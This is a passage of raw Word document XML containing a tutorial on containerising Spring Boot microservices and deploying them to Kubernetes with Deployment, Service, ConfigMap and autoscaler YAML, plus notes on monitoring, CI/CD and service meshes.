          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E52B45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Expose the port on which the application will run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD5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EXPOSE 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68354D9D" w14:textId="77777777" w:rsidR="00D11433" w:rsidRPr="00D11433" w:rsidRDefault="00D11433" w:rsidP="00D11433">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FEF748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Run the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00570A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ENTRYPOINT ["java", "-jar", "my-app.jar"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2627BED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Build the Docker image using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD085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docker build -t my-app .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23915C53"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2. Creating Kubernetes Deployment and Service YAML Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F9B3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Once your microservices are containerized, the next step is to create Kubernetes </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deployment</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rvice</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> YAML files for each microservice. These files define how your microservices will run in the Kubernetes cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243711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of deployment.yaml for a Spring Boot microservice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40574C5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7018612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7254BE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3816ABB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58C5F6B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3D970B5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plicas: 3  # Number of pod replicas to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B1DA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lector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CCDA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tchLabels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F7480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0192380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emplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617BA94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adata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6019C8A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labels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5832CAD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2F9D5C3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ec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E7CBA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ontainers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D84F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name: my-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5761C3E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mage: my-app:latest  # The Docker image name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA5512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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D27360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containerPort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744FD9B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365F5BE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v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035494E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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE0B39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6D575E2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service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC335D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1AF62E5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lector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715C64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 my-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009876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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74103C1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protocol: TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE8C9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port: 80  # Expose on port 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC32A8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argetPort: 8080  # Target port inside the pod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5343826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ClusterIP  # Internal Kubernetes service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEF02A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Deployment: Ensures that the specified number of replicas of the microservice are running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F44F0C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ervice: Exposes the microservice internally within the Kubernetes cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D683D2"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3. Configuring Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8BF4A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Kubernetes provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DNS-based service discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The Service you define in your YAML files will automatically create DNS records for your microservices, so they can be accessed by their service name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263614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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The microservice my-app-service can be accessed by other services in the cluster as my-app-service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C6A7F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f you're using </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in your microservices, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7725D078"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of Eureka configuration in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB787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ring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3309443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loud:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058B142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discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438FF7A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abled: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051D036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etflix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4518188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ureka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4872B16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lient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D015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erviceUrl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F8DAD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defaultZone: http://eureka-server:8761/eureka/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F0568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4. Configuring Externalized Configuration for Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44344C8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ensure that your microservices are configurable and can work across different environments, externalize your configuration by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConfigMaps</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for general configurations and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for sensitive data (e.g., passwords, API keys).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256824C5"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configmap.yaml for externalized configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2757519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v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE2C8C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ConfigMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263D64D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1C52713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config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CCF33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data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A4D7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plication.properties: |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109B47B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url=jdbc:mysql://my-db:3306/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301C189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username=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E942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ring.datasource.password=secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F96340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You can reference this ConfigMap in your Deployment YAML to inject configuration into your microservice containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50578AB9"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5. Setting Up Horizontal Pod Autoscaling (HPA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4971B74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In Kubernetes, you can scale the number of pod replicas for your services based on resource usage (e.g., CPU or memory usage). This is especially important for production environments where load can vary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A919B2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enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Horizontal Pod Autoscaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HPA), create an hpa.yaml file for each microservice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF9F804"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hpa.yaml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AC8AE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utoscaling/v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645A2E9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HorizontalPodAutoscaler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B9384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46B1FB0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hpa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F8FF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4F618EC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caleTargetRef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAF3BB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piVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1991AF2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kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F900F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5FA724D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inReplicas: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3CA0B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Replicas: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EEAC8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rics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495D904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type: Resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257500E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source:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AFB91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cpu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345B884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arget:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36881A7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Utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6BCE5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verageUtilization: 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D80FF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This will scale the my-app-deployment between 3 and 10 replicas based on CPU utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EA26B8"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6. Implementing Logging and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DC111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For efficient debugging and monitoring in production, you need centralized logging and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D88C50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Logging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FB41F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ntegrate </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ELK Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Elasticsearch, Logstash, Kibana) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Fluentd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for centralized logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1E387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Fluentd</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Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will collect logs from the Spring Boot microservices, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kibana</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to visualize and analyze the logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69B6C6"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Monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6895BFF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For monitoring, use </w:t>
      </w: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Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to monitor your microservices' health, performance, and metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F15DB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pring Boot Actuator provides built-in support for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which can be exported to </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA3FA4F"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Prometheus Configuration in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C68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anagement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0BE88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dpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E53A7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web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FFFD5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xposure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A7730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nclude: health,metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF4039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trics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3ABF5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enable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECABC9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all: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1430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Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> scrapes these metrics endpoints and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> visualizes them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565EF90"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7. Continuous Deployment (CD) Pipeline with Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A436B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et up a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CI/CD pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jenkins</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GitLab CI</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Argo CD</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to automate the deployment of your microservices to Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D4B8D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CI/CD Pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Automate building, testing, and deploying the Docker images to Kubernetes whenever a change is pushed to the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC300B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se </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Helm</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> charts for managing Kubernetes resources in a declarative way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FE6D2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8. Managing Network Traffic with Istio or Linkerd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF403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For production deployments, manage traffic between microservices using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service mesh</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Istio</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Linkerd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These tools provide advanced features like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F40961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Traffic Routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Route traffic between microservices with retries, timeouts, and circuit breakers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCBBF9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Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Secure microservices communication with mutual TLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7281AA7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Observability</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Gather detailed metrics and traces for debugging and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73749FCB"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9. Rolling Updates and Rollbacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C231A9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Kubernetes supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rolling updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure that new versions of your microservices are deployed without downtime. If anything goes wrong, Kubernetes can automatically </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>roll back</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11433">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the previous version.</w:t>
      </w:r>
    </w:p>
